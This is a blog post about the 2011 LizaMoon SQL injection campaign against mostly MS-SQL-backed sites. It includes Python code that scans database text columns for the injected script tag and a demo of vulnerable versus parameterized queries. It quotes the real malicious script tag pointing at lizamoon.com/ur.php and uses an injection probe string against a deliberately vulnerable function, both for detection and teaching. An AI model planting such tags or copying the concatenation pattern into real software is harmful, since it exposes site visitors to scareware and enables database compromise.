The Big Lizamoon SQL Injection Attack – March-April 2011



Well – Friday things started getting interesting on the tech news sites. Most of the sites were running April Fools' stories, and a few also carried Websense's report of a big attack going on against many SQL-backed websites. Details are fragmented – people were told to look for ur.php files in their web directory (which isn't really a good test to see whether your site is infected by this SQL injection…). “<script src=http://lizamoon.com/ur.php>” is an example of the code that gets inserted into the SQL databases, and what it actually does is force visitors to visit a scareware site, where malware can be installed on their computer while claiming they have a virus…. (how many of those have we seen in the last 5-10 years?)
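Since the injected code lives in the database rather than on disk, a better check than hunting for a ur.php file is to scan the site's text columns for the injected script tag. The following is an added example (not code from this post or from Websense) that does exactly that; it uses an in-memory SQLite database as a stand-in for the MS-SQL backends discussed here, the table names and rows are constructed sample data, and the only value taken from the page is the lizamoon.com/ur.php script tag itself.

```python
import sqlite3

# The page's example of the injected code is a script tag pointing at an external
# ur.php. This marker is the prefix any such tag shares; the URL below is the one
# quoted on the page, everything else in this file is constructed sample data.
INJECTED_MARKER = "<script src="


def build_sample_db():
    """Constructed sample: two tables, one of which has had the script tag
    appended to a text value, the way the post describes the injection."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE comments (id INTEGER PRIMARY KEY, author VARCHAR(64), text TEXT);
    """)
    conn.executemany("INSERT INTO articles (title, body) VALUES (?, ?)", [
        ("Welcome", "First post."),
        ("Spring update", "News.</title><script src=http://lizamoon.com/ur.php></script>"),
    ])
    conn.execute("INSERT INTO comments (author, text) VALUES (?, ?)", ("alice", "Nice site"))
    conn.commit()
    return conn


def _quote(identifier):
    """Quote a table or column name so it can be spliced into SQL safely."""
    return '"' + identifier.replace('"', '""') + '"'


def text_columns(conn):
    """Yield (table, column) for every character-typed column in user tables,
    found via the catalogue rather than hard-coded, since the injected payload
    can land in any text column the vulnerable query can reach."""
    tables = [r[0] for r in conn.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table' AND name NOT LIKE 'sqlite_%'")]
    for table in tables:
        # PRAGMA table_info rows: cid, name, declared type, notnull, default, pk
        for _cid, name, declared_type, *_rest in conn.execute(f"PRAGMA table_info({_quote(table)})"):
            if declared_type.upper().startswith(
                    ("TEXT", "CHAR", "VARCHAR", "NCHAR", "NVARCHAR", "NTEXT", "CLOB")):
                yield table, name


def find_injected_rows(conn, marker=INJECTED_MARKER):
    """Return (table, column, rowid) for every text value containing the marker.
    SQLite's LIKE is case-insensitive for ASCII, so <SCRIPT SRC= is caught too."""
    hits = []
    for table, column in text_columns(conn):
        rows = conn.execute(
            f"SELECT rowid FROM {_quote(table)} WHERE {_quote(column)} LIKE ?",
            ("%" + marker + "%",))
        hits.extend((table, column, row[0]) for row in rows)
    return hits


if __name__ == "__main__":
    for hit in find_injected_rows(build_sample_db()):
        print("injected script tag in table %s, column %s, rowid %s" % hit)
```

The same walk over the catalogue works against a real backend with the driver of your choice; the point is that the marker is searched in every text column, not just the ones you remember rendering to the page.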

One of my annoyances with tech news coverage (especially virus news) is that once a story becomes big enough to be covered by the major media, it never gets done justice. I want information. What is this attack? Which programs are vulnerable? Is there a pattern?


This is one of the things that annoyed me about the coverage of this particular beastie…. okay, fine, it's an SQL injection… is it MySQL? MS-SQL? some other blend? Is it attacking WordPress or Drupal or Movable Type or what? Not much detail was to be found. There were outrageous claims of 4 million sites infected (which is wildly inflated). The best estimate I've seen is in the 200,000+ range. Google searches showed millions of pages with the suspect text, although that included multiple pages per site and many sites that were simply reporting on the exploit.

So…. Saturday I was asked about it and I hadn't been able to do much research. So, I did a bit of research and found that it seems most every affected site that had been identified by Websense had a Microsoft SQL backend. At that point I breathed a bit easier, knowing that I won't be urgently upgrading 50 or so MySQL-based blog engines… In fact, after reading a bit further I essentially filed it for the weekend, as I have nothing deployed that depends on MS-SQL.

So, today I was thinking that there must be some pattern as to what is vulnerable…. Looking at the Google search that shows the infected blurb of code….

I see .cfm pages, .asp pages, .aspx pages; I found a site with this “powered by”:

Mango Blog: a ColdFusion blog engine

I see several other sites that seem to be database driven, but it's unclear what site design engine I'm looking at. Really, the common denominator is ASP/ColdFusion and Microsoft's framework for web applications.

The best advice that is given is that you should always filter/sanitize input going into databases. In other words, don't trust your site visitors to put good things in forms. Assume they will try to break through to the database underneath by using characters that signal to your database that it's time to execute a command instead of treating the input as text.

There is a good ASP.NET article on preventing SQL injection.

It really is reminiscent of this great cartoon…. about little Bobby Tables….

That being said…. it seems that the better advice is to parameterize your SQL calls….
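To make the difference between “sanitize and concatenate” and “parameterize” concrete, here is an added example (my own illustration, not code from this post, from the ASP.NET article or from any of the blog engines mentioned): the same lookup written both ways against a constructed in-memory SQLite table standing in for an MS-SQL backend. The users table, its rows and the probe string are all made up for the demonstration.

```python
import sqlite3


def setup_db():
    """Constructed sample data: a small users table in an in-memory SQLite
    database (a stand-in for the MS-SQL backends the post discusses)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, email TEXT)")
    conn.executemany("INSERT INTO users (name, email) VALUES (?, ?)", [
        ("alice", "alice@example.invalid"),
        ("bob", "bob@example.invalid"),
    ])
    conn.commit()
    return conn


def find_user_vulnerable(conn, name):
    """The pattern the post warns about: form input pasted straight into the SQL
    text. A quote character inside `name` ends the string literal, and whatever
    follows it is read by the database as SQL rather than as data."""
    sql = "SELECT name FROM users WHERE name = '" + name + "' ORDER BY id"
    return [row[0] for row in conn.execute(sql)]


def find_user_parameterized(conn, name):
    """The fix the post recommends: the query text is fixed and the value is
    bound as a parameter, so the database compares it as text no matter which
    characters it contains. No escaping or character filtering is needed."""
    sql = "SELECT name FROM users WHERE name = ? ORDER BY id"
    return [row[0] for row in conn.execute(sql, (name,))]


def demo():
    """Run both versions with an honest name and with the textbook probe input
    (the quote is what turns the rest of the string into SQL in the first version)."""
    conn = setup_db()
    probe = "' OR '1'='1"
    return {
        "vulnerable": find_user_vulnerable(conn, probe),       # every row comes back
        "parameterized": find_user_parameterized(conn, probe), # no user has that name
        "honest": find_user_parameterized(conn, "alice"),      # normal lookup still works
    }


if __name__ == "__main__":
    for label, rows in demo().items():
        print(f"{label:14s} -> {rows}")
```

The vulnerable version returns every user because the condition collapses to `name = '' OR '1'='1'`; the parameterized version returns nothing because it is looking for a user literally named `' OR '1'='1`. The same split applies to `SqlCommand.Parameters` in ASP.NET and `cfqueryparam` in ColdFusion: the query shape is decided by your code, the values by the visitor, and the two never get mixed.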

Good tutorial site on avoiding SQL injection problems

I suspect there are many hundreds of site owners that still aren’t aware that they were compromised.

So here's the flamebait… are poor SQL coding practices a common trait in the Microsoft toolkit environment?

I doubt it's just an MS toolkit issue… although the proliferation of “easily make your own database driven site” toolkits would seem to encourage sloppy design. (Yes – I know… open source based blog engines have had their share of SQL injection issues too….)

Making it easy for anyone to make a database driven website does not mean everyone will follow best practices for validating input. (In fact, in most things that I've seen, making things easier seems to encourage cutting corners…)
